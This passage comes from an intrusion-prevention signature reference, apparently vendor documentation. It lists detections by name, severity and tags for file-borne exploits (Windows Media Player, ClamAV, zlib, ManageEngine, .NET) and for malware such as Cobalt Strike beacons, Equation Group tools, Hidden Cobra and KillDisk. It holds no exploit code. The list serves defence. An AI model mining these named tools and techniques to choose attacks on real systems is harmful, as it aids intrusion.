File-Binary_Windows-Media-HTTP-Stream

About this situation: Windows Media HTTP stream detected
Context: Other Binary File Stream
Severity: 1
Tags: Windows, Any Hardware, Windows Media Player, Windows not specific, Streaming Protocols, Media File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Windows-Media-HTTP-Stream-Download
File-Type-Identification
Description:
Back to top

File-Binary_Windows-Media-Player-ASF-CVE-2009-2527

About this situation: An exploit against Windows Media Players ASF parser detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Media-Player-Code-Execution-MS09-052
Description:
Back to top

File-Binary_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow

About this situation: Exploit against Windows Media Player via malformed BMP header (MS06-005)
Context: Other Binary File Stream
Severity: 7
Tags: Windows, x86, Windows Media Player, MS2006-02, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: BMP-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
Description:
Back to top

File-Binary_Windows-Media-Player-DVR-MS-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Windows Media Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2011-12, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-Windows-Media-Player-DVR-MS-Memory-Corruption
Description:
Back to top

File-Binary_Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818

About this situation: A malicious ASF file targeting CVE-2010-0818 over HTTP detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-09, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
Description:
Back to top

File-Binary_Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525

About this situation: A malicious ASF file targeting CVE-2009-2525 over HTTP detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
Description:
Back to top

File-Binary_Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555

About this situation: A malicious ASF file targeting CVE-2009-0555 over HTTP detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
Description:
Back to top

File-Binary_Windows-Memory-Disclosure-CVE-2017-0038

About this situation: An attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-856-5242
Last changed: sgpkg-ips-856-5242
Vulnerability: Windows-Memory-Disclosure-CVE-2017-0038
Description:
Back to top

File-Binary_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2023-05, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
Description:
Back to top

File-Binary_Windows-OpenType-CVE-2013-3128

About this situation: A suspicious binary file detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-847-5242
Last changed: sgpkg-ips-847-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Binary_Windows-Shell-Shortcut-Arbitrary-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Windows
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Windows-Shell-Shortcut-Arbitrary-Code-Execution
Description:
Back to top

File-Binary_Windows-Task-Scheduler-Job-File-System-Compromise

About this situation: Buffer overflow attempt against Windows Task Scheduler
Context: Other Binary File Stream
Severity: 7
Tags: Windows, x86, Windows Task Scheduler, MS2004-07, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Windows-Task-Scheduler-Job-File-System-Compromise
Description:
Back to top

File-Binary_Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Vulnerability: Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413
Description:
Back to top

File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-29324

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-05, CVE2023, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1620-5242
Vulnerability: Windows-URL-Zone-Check-Bypass-CVE-2023-29324
Description:
Back to top

File-Binary_Windows-URL-Zone-Check-Bypass-CVE-2023-35384

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-08, CVE2023, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1619-5242
Last changed: sgpkg-ips-1619-5242
Vulnerability: Windows-URL-Zone-Check-Bypass-CVE-2023-35384
Description:
Back to top

File-Binary_Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Wireshark detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Wireshark-Netscreen-Dissector-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Binary_WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow

About this situation: Detects malformed placeable WMF images with an illegal FileSize value in header (MS06-004)
Context: Other Binary File Stream
Severity: 7
Tags: Windows 2000, Windows ME, x86, MS2006-02, CVE2006, Windows 2000 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: WMF-Microsoft-Windows-WMF-Header-Filesize-Buffer-Overflow
Description:
Back to top

File-Binary_Word-Perfect-Document

About this situation: Word Perfect document file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Document
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Binary_x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_x86-X90nop-Shellcode

About this situation: Shellcode x90 nop detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-570-5211
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-Binary_XAR-Archive

About this situation: XAR archive file download detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, XAR, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-590-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: XAR-Archive-File-Transfer
File-Type-Identification
Description:
Back to top

File-Binary_XMRig_CPU_Miner_Binary_File

About this situation: XMRig binary file was detected
Context: Other Binary File Stream
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: XMRig_CPU_Miner_Binary_File
Description:
Back to top

File-Binary_Xnview-PCT-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in XnView XnView detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, XnView, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Xnview-PCT-File-Processing-Buffer-Overflow
Description:
Back to top

File-Binary_Ysoserial-Generated-DotNet-Serialized-Object

About this situation: .NET serialized object with Ysoserial gadget chain characteristics detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Ysoserial-Generated-DotNet-Serialized-Object
Description:
Back to top

File-Binary_Zlib-Denial-Of-Service-CVE-2004-0797

About this situation: An attempt to exploit a vulnerability in zlib Software ZLib Compression Library detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, zlib, CVE2004, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-947-5242
Vulnerability: Zlib-Denial-Of-Service-CVE-2004-0797
Description:
Back to top

File-Binary_Zlib-Library-inflateGetHeader-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the decompression component of the zlib compression library detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, zlib, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1506-5242
Last changed: sgpkg-ips-1506-5242
Vulnerability: Zlib-Library-inflateGetHeader-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine AssetExplorer, Zoho Corporation ManageEngine SupportCenter, Zoho Corporation ManageEngine ServiceDesk, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1575-5242
Last changed: sgpkg-ips-1575-5242
Vulnerability: Zoho-Manageengine-Multiple-Products-Imageuploadservlet-Denial-Of-Service
Description:
Back to top

File-Binary_Zoho-Manageengine-Opmanager-Datamigrationservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Zoho-Manageengine-Opmanager-Datamigrationservlet-Insecure-Deserialization
Description:
Back to top

File-Binary_Zoho-Manageengine-Opmanager-Getobjectdata-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: Zoho-Manageengine-Opmanager-Getobjectdata-Insecure-Deserialization
Description:
Back to top

File-Binary_Zoho-Manageengine-Opmanager-SumPDU-Java-Deserialization

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine OpManager detected.
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Zoho Corporation ManageEngine OpManager, CVE2020, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Zoho-Manageengine-Opmanager-SumPDU-Java-Deserialization
Description:
Back to top

File-Dropper

About this situation: File Dropper usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1160-5242
Description: File Dropper is a file storage service where you can upload all your files anonymously and easily share these files with your friends and family. The application can be accessed using a web browser at the site: www.filedropper.com.
Back to top

File-Exe_Adobe-Reader-Security-Bypass-CVE-2013-0624

About this situation: Attempt to exploit vulnerability in Adobe Reader
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Adobe-Reader-Security-Bypass-CVE-2013-0624
Description:
Back to top

File-Exe_Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in ClamAV detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-634-5211
Vulnerability: Clamav-libclamav-MEW-PE-File-Handling-Integer-Overflow
Description:
Back to top

File-Exe_Clamav-libclamav-PE-File-Handling-Integer-Overflow

About this situation: Crafted PE file detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: HTTP-Clamav-libclamav-PE-File-Handling-Integer-Overflow
Description:
Back to top

File-Exe_Clamav-UPX-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ClamAV detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Clamav-UPX-File-Handling-Buffer-Overflow
Description:
Back to top

File-Exe_Clamav-UPX-File-Handling-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in ClamAV Project ClamAV detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Clamav-UPX-File-Handling-Heap-Overflow
Description:
Back to top

File-Exe_Clamav-UPX-File-Handling-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in ClamAV Clam AntiVirus detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-649-5211
Last changed: sgpkg-ips-1119-5242
Vulnerability: Clamav-UPX-File-Handling-Integer-Overflow
Description:
Back to top

File-Exe_Clamav-UPX-File-PE-Parsing-Memory-Access-Error

About this situation: An attempt to exploit a vulnerability in ClamAV Project ClamAV detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ClamAV, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1617-5242
Vulnerability: Clamav-UPX-File-PE-Parsing-Memory-Access-Error
Description:
Back to top

File-Exe_Cobalt-Strike-Beacon-File

About this situation: Cobalt Strike beacon was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1385-5242
Vulnerability: Cobalt-Strike-Beacon-File
Description:
Back to top

File-Exe_Conflicting-Content-Type-Flash

About this situation: File with an overlapping headers was found
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-902-5242
Last changed: sgpkg-ips-902-5242
Description:
Back to top

File-Exe_Conflicting-Content-Type-HTA

About this situation: The file extension reported different file type than was identified
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1310-5242
Vulnerability: Microsoft-Windows-PE-File-Signature-Spoofing-Vulnerability
Description:
Back to top

File-Exe_Conflicting-Content-Type-Text

About this situation: Detected conflicting Content-Type header
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1661-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Exe_Conflicting-Content-Type-Text-HTML

About this situation: Detected conflicting Content-Type header
Context: Executable File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Violations, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Exe_Conflicting-Content-Type-Text-Plain

About this situation: Detected conflicting Content-Type header
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Protocol Information
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1661-5242
Vulnerability: Conflicting-Content-Type-Header
Description:
Back to top

File-Exe_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: Executable File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-Exe_EQGRP-EternalBlue-2.2.0.exe

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Exe_EQGRP-Eternalchampion

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Exe_EQGRP-Eternalromance

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Exe_EQGRP-Eternalsynergy

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-913-5242
Last changed: sgpkg-ips-913-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Exe_EQGRP-teflondoor.exe

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-926-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Exe_EQGRP-teflonhandle.exe

About this situation: A file associated with the Equation Group (EQGRP) was detected
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-900-5242
Last changed: sgpkg-ips-920-5242
Vulnerability: EQGRP-Tools
Description:
Back to top

File-Exe_Executable-File-Download

About this situation: Executable file download detected
Context: Executable File Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-610-5211
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

File-Exe_Executable-File-Transfer

About this situation: Executable file download detected
Context: Executable File Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1423-5242
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

File-Exe_Executable-File-Upload

About this situation: Executable file download detected
Context: Executable File Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1423-5242
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

File-Exe_Executable-From-A-Suspicious-Site

About this situation: Detected a suspicious Exe file
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-892-5242
Description:
Back to top

File-Exe_Executable-In-Archive

About this situation: Exe file has been detected in zip formatted archive
Context: Executable File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1423-5242
Vulnerability: Executable-File-Transfer
Description:
Back to top

File-Exe_Executable-Matching-Exploit-CVE-2021-1647-1

About this situation: An executable matching exploit code seen used with CVE-2021-1647 detected.
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2021-01, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1312-5242
Last changed: sgpkg-ips-1312-5242
Vulnerability: Microsoft-Defender-Remote-Code-Execution-Vulnerability-CVE-2021-1647
Description:
Back to top

File-Exe_Executable-Matching-Exploit-CVE-2021-1647-2

About this situation: An executable matching exploit code seen used with CVE-2021-1647 detected.
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2021-01, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1312-5242
Last changed: sgpkg-ips-1312-5242
Vulnerability: Microsoft-Defender-Remote-Code-Execution-Vulnerability-CVE-2021-1647
Description:
Back to top

File-Exe_Executable_Disguised_As_Image_File

About this situation: Executable disguised as an image file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1064-5242
Vulnerability: Executable_Disguised_As_Image_File
Description:
Back to top

File-Exe_FireEye-Red-Team-Tools-TypelibGUID

About this situation: Executable matching a FireEye Red Team tool detected.
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: FireEye-Red-Team-Tools
Description:
Back to top

File-Exe_HIDDEN-COBRA-Executable-COPPERHEDGE

About this situation: Malicious executable Hidden Cobra detected.
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: HIDDEN-COBRA
Description:
Back to top

File-Exe_HIDDEN-COBRA-Executable-PEBBLEDASH

About this situation: Malicious executable Hidden Cobra detected.
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: HIDDEN-COBRA
Description:
Back to top

File-Exe_HIDDEN-COBRA-Executable-TAINTEDSCRIBE

About this situation: Malicious executable Hidden Cobra detected.
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: HIDDEN-COBRA
Description:
Back to top

File-Exe_HTML-Identification-Evasion

About this situation: HTML file contains exe magic byte
Context: Executable File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-610-5211
Description:
Back to top

File-Exe_KillDisk-Malware-Binary-File

About this situation: KillDisk malware binary file was detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1080-5242
Vulnerability: KillDisk-Binary-File
Description:
Back to top

File-Exe_Linear-Executable-LE

About this situation: Linear executable (LE) file detected
Context: Executable File Stream
Severity: 1
Tags: Windows, OS/2, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_Linear-Executable-LX

About this situation: Linear executable (LX) file detected
Context: Executable File Stream
Severity: 1
Tags: Windows, OS/2, Any Hardware, Windows not specific, Protocol Information
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-Exe_Microjoin.gen_C-Download

About this situation: A suspicious file download detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Downloader.Microjoin.gen_C-Botnet
Description:
Back to top

File-Exe_Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-.NET-Framework-Improper-Execution-Of-Function-Pointer
Description:
Back to top

File-Exe_Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2013-01, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Microsoft-.NET-Framework-S.DS.P-Namespace-Method-Buffer-Overflow
Description:
Back to top

File-Exe_Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: Executable File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, Silverlight, MS2011-10, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-974-5242
Vulnerability: Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
Description:
Back to top

File-Exe_Microsoft-.NET-Framework-Winforms-Buffer-Overflow

